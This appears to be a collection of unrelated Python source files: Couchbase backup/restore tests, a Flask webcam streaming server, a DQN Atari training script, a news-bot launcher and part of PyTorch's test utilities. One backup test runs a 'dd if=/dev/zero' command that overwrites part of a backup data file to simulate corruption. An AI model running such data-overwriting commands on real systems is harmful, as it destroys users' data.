rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
rest_src.create_bucket(bucket='default', ramQuotaMB=int(self.quota) - 1,
bucketType=self.bucket_type,
evictionPolicy="noEviction")
self.add_built_in_server_user(node=self.backupset.cluster_host)
gen = DocumentGenerator('test_docs', '{{"age": {0}}}', xrange(100),
start=0, end=self.num_items)
self.buckets = rest_src.get_buckets()
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
cmd = "cbindex -type create -bucket default -using %s -index age -fields=age " \
" -auth %s:%s" % (self.test_storage_mode,
self.master.rest_username,
self.master.rest_password)
shell = RemoteMachineShellConnection(self.backupset.cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = shell.execute_command(command)
shell.log_command_output(output, error)
shell.disconnect()
if error or "Index created" not in output[-1]:
self.fail("GSI index cannot be created")
self.backup_cluster_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['kv', 'index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
cmd = "cbindex -type list -auth %s:%s" % (self.master.rest_username,
self.master.rest_password)
shell = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = shell.execute_command(command)
shell.log_command_output(output, error)
shell.disconnect()
try:
if len(output) > 1:
self.assertTrue("Index:default/age" in output[1],
"GSI index not created in restore cluster as expected")
self.log.info("GSI index created in restore cluster as expected")
else:
self.fail("GSI index not created in restore cluster as expected")
finally:
if Bucket.Type.EPHEMERAL in self.bucket_type:
self.log.info("reset storage mode back to original")
self._reset_storage_mode(rest_src, self.cluster_storage_mode)
self._reset_storage_mode(rest_target, self.cluster_storage_mode)
def test_backup_merge_restore_with_gsi(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a GSI index on source cluster
4. Backsup data and validates
5. Restores data ans validates
6. Ensures that same gsi index is created in restore cluster
"""
rest_src = RestConnection(self.backupset.cluster_host)
rest_src.add_node(self.servers[1].rest_username,
self.servers[1].rest_password,
self.servers[1].ip, services=['index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [],
[])
rebalance.result()
gen = DocumentGenerator('test_docs', '{{"Num1": {0}, "Num2": {1}}}',
xrange(100), xrange(100),
start=0, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
cmd = "cbindex -type create -bucket default -using forestdb -index " \
"num1 -fields=Num1"
remote_client = RemoteMachineShellConnection(
self.backupset.cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
if error or "Index created" not in output[-1]:
self.fail("GSI index cannot be created")
self.backup_cluster_validate()
cmd = "cbindex -type create -bucket default -using forestdb -index " \
"num2 -fields=Num2"
remote_client = RemoteMachineShellConnection(
self.backupset.cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
if error or "Index created" not in output[-1]:
self.fail("GSI index cannot be created")
self.backup_cluster_validate()
self.backupset.start = 1
self.backupset.end = len(self.backups)
self.backup_merge_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['index'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [],
[])
rebalance.result()
start = self.number_of_backups_taken
end = self.number_of_backups_taken
self.backupset.start = start
self.backupset.end = end
self.backup_restore_validate(compare_uuid=False,
seqno_compare_function=">=")
cmd = "cbindex -type list"
remote_client = RemoteMachineShellConnection(
self.backupset.restore_cluster_host)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
remote_client.disconnect()
if len(output) > 1:
self.assertTrue("Index:default/Num1" in output[1],
"GSI index not created in restore cluster as expected")
self.log.info("GSI index created in restore cluster as expected")
else:
self.fail("GSI index not created in restore cluster as expected")
def test_backup_restore_with_fts(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backupset
3. Creates a simple FTS index on source cluster
4. Backsup data and validates
5. Restores data ans validates
6. Ensures that same FTS index is created in restore cluster
"""
rest_src = RestConnection(self.backupset.cluster_host)
rest_src.add_node(self.servers[1].rest_username, self.servers[1].rest_password,
self.servers[1].ip, services=['kv', 'fts'])
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, [], [])
rebalance.result()
gen = DocumentGenerator('test_docs', '{{"age": {0}}}', xrange(100), start=0,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
rest_src_fts = RestConnection(self.servers[1])
try:
from pytests.fts.fts_callable import FTSCallable
fts_obj = FTSCallable(nodes=self.servers, es_validate=False)
index = fts_obj.create_default_index(
index_name="index_default",
bucket_name="default")
fts_obj.wait_for_indexing_complete()
alias = fts_obj.create_alias(target_indexes=[index])
except Exception, ex:
self.fail(ex)
self.backup_cluster_validate()
rest_target = RestConnection(self.backupset.restore_cluster_host)
rest_target.add_node(self.input.clusters[0][1].rest_username,
self.input.clusters[0][1].rest_password,
self.input.clusters[0][1].ip, services=['kv', 'fts'])
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, [], [])
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
rest_target_fts = RestConnection(self.input.clusters[0][1])
status = False
try:
status, content = rest_target_fts.get_fts_index_definition(index.name)
self.assertTrue(status and content['status'] == 'ok',
"FTS index not found in restore cluster as expected")
self.log.info("FTS index found in restore cluster as expected")
status, content = rest_target_fts.get_fts_index_definition(alias.name)
self.assertTrue(status and content['status'] == 'ok',
"FTS alias not found in restore cluster as expected")
self.log.info("FTS alias found in restore cluster as expected")
finally:
rest_src_fts.delete_fts_index(index.name)
rest_src_fts.delete_fts_index(alias.name)
if status:
rest_target_fts.delete_fts_index(index.name)
rest_target_fts.delete_fts_index(alias.name)
def test_backup_restore_with_xdcr(self):
"""
1. Creates a XDCR replication between first two servers
2. Creates specified bucket on the cluster and loads it with given number of items
3. Backsup data and validates while replication is going on
4. Restores data and validates while replication is going on
"""
rest_src = RestConnection(self.backupset.cluster_host)
rest_dest = RestConnection(self.servers[1])
try:
rest_src.remove_all_replications()
rest_src.remove_all_remote_clusters()
rest_src.add_remote_cluster(self.servers[1].ip, self.servers[1].port, self.backupset.cluster_host_username,
self.backupset.cluster_host_password, "C2")
rest_dest.create_bucket(bucket='default', ramQuotaMB=512)
self.sleep(10)
repl_id = rest_src.start_replication('continuous', 'default', "C2")
if repl_id is not None:
self.log.info("Replication created successfully")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
tasks = self._async_load_all_buckets(self.master, gen, "create", 0)
self.sleep(10)
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
for task in tasks:
task.result()
finally:
rest_dest.delete_bucket()
def test_backup_restore_with_warmup(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Warmsup the cluster host
2. Backsup data and validates while warmup is on
3. Restores data and validates while warmup is on
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
NodeHelper.do_a_warm_up(self.backupset.cluster_host)
self.sleep(30)
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
""" only membase bucket has warmup state """
if self.bucket_type == Bucket.Type.MEMBASE:
NodeHelper.wait_warmup_completed([self.backupset.cluster_host])
def stat(self, key):
stats = StatsCommon.get_stats([self.master], 'default', "", key)
val = stats.values()[0]
if val.isdigit():
val = int(val)
return val
def load_to_dgm(self, active=75, ttl=0):
"""
decides how many items to load to enter active% dgm state
where active is an integer value between 0 and 100
"""
doc_size = 1024
curr_active = self.stat('vb_active_perc_mem_resident')
# go into heavy dgm
while curr_active > active:
curr_items = self.stat('curr_items')
gen_create = BlobGenerator('dgmkv', 'dgmkv-', doc_size, start=curr_items + 1, end=curr_items + 50000)
try:
self._load_all_buckets(self.master, gen_create, "create", ttl)
except:
pass
curr_active = self.stat('vb_active_perc_mem_resident')
def test_backup_restore_with_dgm(self):
"""
1. Creates specified bucket on the cluster and loads it until dgm
2. Creates a backup set
3. Backsup data and validates
4. Restores data and validates
"""
self.load_to_dgm()
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_auto_compaction(self):
"""
1. Creates specified bucket on the cluster and loads it
2. Updates auto compaction settings
3. Validates backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest = RestConnection(self.backupset.cluster_host)
rest.set_auto_compaction(dbFragmentThresholdPercentage=80,
dbFragmentThreshold=100,
viewFragmntThresholdPercentage=80,
viewFragmntThreshold=100,
bucket="default")
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_update_notifications(self):
"""
1. Creates specified bucket on the cluster and loads it
2. Updates notification settings
3. Validates backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest = RestConnection(self.backupset.cluster_host)
rest.update_notifications("true")
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_backup_restore_with_alerts(self):
"""
1. Creates specified bucket on the cluster and loads it
2. Updates alerts settings
3. Validates backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest = RestConnection(self.backupset.cluster_host)
rest.set_alerts_settings('couchbase@localhost', 'root@localhost', 'user', 'pwd')
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function=">=")
def test_merge_with_crash(self):
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=5)
try:
merge_result = self.cluster.async_merge_cluster(backup_host=self.backupset.backup_host,
backups=self.backups,
start=1, end=5,
directory=self.backupset.directory,
name=self.backupset.name,
cli_command_location=self.cli_command_location)
self.sleep(10)
self._kill_cbbackupmgr()
merge_result.result(timeout=400)
except TimeoutError:
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
if backup_name in self.backups:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(self.backups), "Number of backups after merge crash did not match")
self.log.info("Number of backups after merge crash matched")
def test_compact_with_crash(self):
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster()
status, output_before_compact, message = self.backup_list()
if not status:
self.fail(message)
try:
compact_result = self.cluster.async_compact_cluster(backup_host=self.backupset.backup_host,
backups=self.backups,
backup_to_compact=self.backupset.backup_to_compact,
directory=self.backupset.directory,
name=self.backupset.name,
cli_command_location=self.cli_command_location)
self.sleep(10)
self._kill_cbbackupmgr()
compact_result.result(timeout=400)
except TimeoutError:
status, output_after_compact, message = self.backup_list()
if not status:
self.fail(message)
status, message = self.validation_helper.validate_compact_lists(output_before_compact,
output_after_compact,
is_approx=True)
if not status:
self.fail(message)
self.log.info(message)
def test_backup_restore_misc(self):
"""
Misc scenarios for backup and restore
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backupset.name = "!@#$%^&"
output, error = self.backup_create()
self.assertTrue("Backup `!@#$%^` created successfully" in output[0],
"Backup could not be created with special characters")
self.log.info("Backup created with special characters")
self.backupset.name = "backup"
self.backup_create()
self.backup_cluster()
conn = RemoteMachineShellConnection(self.backupset.backup_host)
command = "ls -tr {0}/{1}/{2} | tail".format(self.backupset.directory, self.backupset.name, self.backups[0])
o, e = conn.execute_command(command)
data_dir = o[0]
conn.execute_command("dd if=/dev/zero of=/tmp/entbackup/backup/" +
str(self.backups[0]) +
"/" + data_dir + "/data/shard_0.fdb" +
" bs=1024 count=100 seek=10 conv=notrunc")
output, error = self.backup_restore()
self.assertTrue("Restore failed due to an internal issue, see logs for details" in output[-1],
"Expected error not thrown when file is corrupt")
self.log.info("Expected error thrown when file is corrupted")
conn.execute_command("mv /tmp/entbackup/backup /tmp/entbackup/backup2")
conn.disconnect()
output, error = self.backup_restore()
self.assertTrue("Backup Repository `backup` not found" in output[-1], "Expected error message not thrown")
self.log.info("Expected error message thrown")
""" cbbackup restore enhancement only from vulcan """
def test_cbbackupmgr_collect_logs(self):
"""
cbbackupmgr collect-logs will collect logs to archive or
output to any path supplied with flag -o
CB_ARCHIVE_PATH
ex: cbbackupmgr collect-logs -a /tmp/backup
cbbackupmgr collect-logs -a /tmp/backup -o /tmp/logs
"""
if "5.5" > self.cb_version[:3]:
self.fail("This test is only for cb version 5.5 and later. ")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._collect_logs()
def test_cbbackupmgr_restore_with_ttl(self):
"""
cbbackupmgr restore --replace-ttl will replace ttl
value with flag --replace-ttl-with
ex: cbbackupmgr restore --replace-ttl all --replace-ttl-with 0
"""
if "5.5" > self.cb_version[:3]:
self.fail("This restore with ttl test is only for cb version 5.5 and later. ")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
if self.replace_ttl == "expired":
if self.bk_with_ttl:
self._load_all_buckets(self.master, gen, "create", int(self.bk_with_ttl))
else:
self._load_all_buckets(self.master, gen, "create", 0)
else:
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
if self.bk_with_ttl:
self.sleep(int(self.bk_with_ttl) + 10, "wait items to be expired in backup")
compare_function = "=="
if self.replace_ttl_with:
compare_function = "<="
if self.should_fail:
self.backup_restore()
else:
self.backup_restore_validate(compare_uuid=False,
seqno_compare_function=compare_function)
def test_cbbackupmgr_restore_with_vbuckets_filter(self):
"""
cbbackupmgr restore --vbuckets-filter 2,3,4,5,6
it may require to get minimum 2 nodes servers to run this test
"""
if "5.5" > self.cb_version[:3]:
self.fail("This test is only for cb version 5.5 and later. ")
self.num_items = 1000
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
if self.should_fail:
self.backup_restore()
else:
self.backup_restore_validate()
def test_cbbackupmgr_with_eventing(self):
"""
Create backup cluster with saslbucket (default_bucket=False).
Create events
Backup cluster
Create restore cluster
Restore data back to restore cluster
Verify events restored back
"""
if "5.5" > self.cb_version[:3]:
self.fail("This eventing test is only for cb version 5.5 and later. ")
from pytests.eventing.eventing_constants import HANDLER_CODE
from lib.testconstants import STANDARD_BUCKET_PORT
self.src_bucket_name = self.input.param('src_bucket_name', 'src_bucket')
self.eventing_log_level = self.input.param('eventing_log_level', 'INFO')
self.dst_bucket_name = self.input.param('dst_bucket_name', 'dst_bucket')
self.dst_bucket_name1 = self.input.param('dst_bucket_name1', 'dst_bucket1')
self.metadata_bucket_name = self.input.param('metadata_bucket_name', 'metadata')
self.create_functions_buckets = self.input.param('create_functions_buckets', True)
self.docs_per_day = self.input.param("doc-per-day", 1)
self.use_memory_manager = self.input.param('use_memory_manager', True)
bucket_params = self._create_bucket_params(server=self.master, size=128,
replicas=self.num_replicas)
self.cluster.create_standard_bucket(name=self.src_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.src_bucket = RestConnection(self.master).get_buckets()
self.cluster.create_standard_bucket(name=self.dst_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.metadata_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.gens_load = self.generate_docs(self.docs_per_day)
self.expiry = 3
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.load(self.gens_load, buckets=self.buckets, flag=self.item_flag, verify_data=False,
batch_size=self.batch_size)
function_name = "Function_{0}_{1}".format(randint(1, 1000000000), self._testMethodName)
self.function_name = function_name[0:90]
body = self.create_save_function_body(self.function_name, HANDLER_CODE.BUCKET_OPS_ON_UPDATE, worker_count=3)
bk_events_created = False
rs_events_created = False
try:
self.deploy_function(body)
bk_events_created = True
self.backup_create()
self.backup_cluster()
rest_src = RestConnection(self.backupset.cluster_host)
bk_fxn = rest_src.get_all_functions()
if bk_fxn != "":
self._verify_backup_events_definition(json.loads(bk_fxn))
self.backup_restore()
self.rest = RestConnection(self.backupset.restore_cluster_host)
self.wait_for_bootstrap_to_complete(body['appname'])
rs_events_created = True
self._verify_restore_events_definition(bk_fxn)
except Exception as e:
self.fail(e)
finally:
master_nodes = [self.backupset.cluster_host,
self.backupset.restore_cluster_host]
for node in master_nodes:
self.rest = RestConnection(node)
buckets = self.rest.get_buckets()
for bucket in buckets:
items = self.rest.get_active_key_count(bucket)
self.undeploy_and_delete_function(body)
self.rest = RestConnection(self.master)
|
stream_server.py
|
from imutils.video import VideoStream
from flask import Response
from flask import Flask
from flask import render_template
import threading
import argparse
import datetime
import imutils
import time
import cv2
outputFrame = None
lock = threading.Lock()
app = Flask(__name__)
vs = VideoStream(resolution=(240, 180), src = 0).start()
time.sleep(2.0)
@app.route("/")
def index():
return render_template("index.html")
def get_frame(frameCount):
global vs, outputFrame, lock
total = 0
while True:
frame = vs.read()
#frame = imutils.resize(frame, width=320)
total += 1
with lock:
outputFrame = frame.copy()
def generate():
global outputFrame, lock
while True:
with lock:
if outputFrame is None:
continue
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
if not flag:
continue
yield(b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + bytearray(encodedImage) + b'\r\n')
@app.route('/video_feed')
def video_feed():
return Response(generate(), mimetype = "multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
t = threading.Thread(target=get_frame, args=(32,))
t.daemon = True
t.start()
app.run(host="0.0.0.0", port=33333, threaded=True, use_reloader=False)
vs.stop()
|
run_dqn_atari_log.py
|
import argparse
import gym
from gym import wrappers
import os.path as osp
import os
import time
import random
import numpy as np
import tensorflow as tf
import tensorflow.contrib.layers as layers
from multiprocessing import Process
import dqn_log as dqn
from dqn_utils import *
from atari_wrappers import *
def atari_model(img_in, num_actions, scope, reuse=False):
# as described in https://storage.googleapis.com/deepmind-data/assets/papers/DeepMindNature14236Paper.pdf
with tf.variable_scope(scope, reuse=reuse):
out = img_in
with tf.variable_scope("convnet"):
# original architecture
out = layers.convolution2d(out, num_outputs=32, kernel_size=8, stride=4, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=4, stride=2, activation_fn=tf.nn.relu)
out = layers.convolution2d(out, num_outputs=64, kernel_size=3, stride=1, activation_fn=tf.nn.relu)
out = layers.flatten(out)
with tf.variable_scope("action_value"):
out = layers.fully_connected(out, num_outputs=512, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
return out
def atari_learn(exp_name,
task,
seed,
logdir,
checkpoint_dir,
num_timesteps,
target_update_freq):
# get environment
env = get_env(task, seed)
session = get_session()
# This is just a rough estimate
num_iterations = float(num_timesteps) / 4.0
lr_multiplier = 1.0
lr_schedule = PiecewiseSchedule([
(0, 1e-4 * lr_multiplier),
(num_iterations / 10, 1e-4 * lr_multiplier),
(num_iterations / 2, 5e-5 * lr_multiplier),
],
outside_value=5e-5 * lr_multiplier)
optimizer = dqn.OptimizerSpec(
constructor=tf.train.AdamOptimizer,
kwargs=dict(epsilon=1e-4),
lr_schedule=lr_schedule
)
def stopping_criterion(env, t):
# notice that here t is the number of steps of the wrapped env,
# which is different from the number of steps in the underlying env
return get_wrapper_by_name(env, "Monitor").get_total_steps() >= num_timesteps
exploration_schedule = PiecewiseSchedule(
[
(0, 1.0),
(1e6, 0.1),
(10e6/2, 0.01),
], outside_value=0.01
)
dqn.learn(
exp_name,
env,
q_func=atari_model,
optimizer_spec=optimizer,
session=session,
logdir = logdir,
checkpoint_dir = checkpoint_dir,
exploration=exploration_schedule,
stopping_criterion=stopping_criterion,
replay_buffer_size=1000000,
batch_size=32,
gamma=0.99,
learning_starts=50000,
learning_freq=4,
frame_history_len=4,
target_update_freq=target_update_freq,
grad_norm_clipping=10
)
env.close()
def get_available_gpus():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.physical_device_desc for x in local_device_protos if x.device_type == 'GPU']
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
def get_session():
tf.reset_default_graph()
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=1,
intra_op_parallelism_threads=1)
session = tf.Session(config=tf_config)
print("AVAILABLE GPUS: ", get_available_gpus())
return session
def get_env(task, seed):
env_id = task.env_id
env = gym.make(env_id)
set_global_seeds(seed)
env.seed(seed)
expt_dir = '/tmp/hw3_vid_dir2/'
env = wrappers.Monitor(env, osp.join(expt_dir, "gym"), force=True)
env = wrap_deepmind(env)
return env
def main(args):
# Get Atari games.
benchmark = gym.benchmark_spec('Atari40M')
# Change the index to select a different game.
task = benchmark.tasks[3]
env_name = task.env_id
# create the logs directory
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
# Run training
num_timesteps = args.num_timesteps or task.max_timesteps
def train_func():
atari_learn(args.exp_name,
task,
seed,
logdir=os.path.join(logdir,'%d'%seed),
checkpoint_dir=args.checkpoint_dir ,
num_timesteps=num_timesteps,
target_update_freq=args.target_update_freq)
p = Process(target=train_func, args=tuple())
p.start()
p.join()
def get_arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument(
"--target_update_freq",
type=int,
default=10000,
help="How often to copy current network to target network",
)
parser.add_argument(
"--num_timesteps",
type=int,
default=16000000,
help="Maximum number of timesteps to run",
)
parser.add_argument(
"--replay_buffer_size",
type=int,
default=1000000,
help="Size of the replay buffer",
)
parser.add_argument(
"--checkpoint_dir",
type=str,
default='./checkpoints',
help="Directory to checkpoint NN",
)
return parser
if __name__ == "__main__":
main(get_arg_parser().parse_args())
|
main.py
|
import threading
from time import sleep
import schedule
from newsweec.meta.logger import logging # noreorder
from newsweec.meta.logger import Logger # noreorder
from newsweec.bot.bot import get_user_from_user_handler
from newsweec.bot.bot import poll
from newsweec.news.news_collector import collect_news
DEBUG = logging.DEBUG
m_l = logging.getLogger("main")
main_logger = Logger(m_l, DEBUG, filename="")
def start_bot():
def _pol():
main_logger.log(logging.INFO, "Starting bot")
poll()
def _sched():
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
main_logger.log(logging.DEBUG, message="Starting scheduler")
schedule.every(0.5).seconds.do(
run_threaded, get_user_from_user_handler)
# schedule.every(20).seconds.do(run_threaded, clean_q)
# schedule.every().day.at("01:00").do(run_threaded, todays_tasks)
schedule.every(1).hour.do(run_threaded, collect_news)
# get_q_users()
pol_t = threading.Thread(target=_pol, daemon=True)
sched = threading.Thread(target=_sched, daemon=True)
pol_t.start()
sched.start()
# pol_t.join()
# sched.join()
# keep the main thread alive 😁 so that i can use Ctrl + c to stop the execution
while True:
try:
schedule.run_pending()
sleep(1)
except KeyboardInterrupt:
quit()
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is address
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
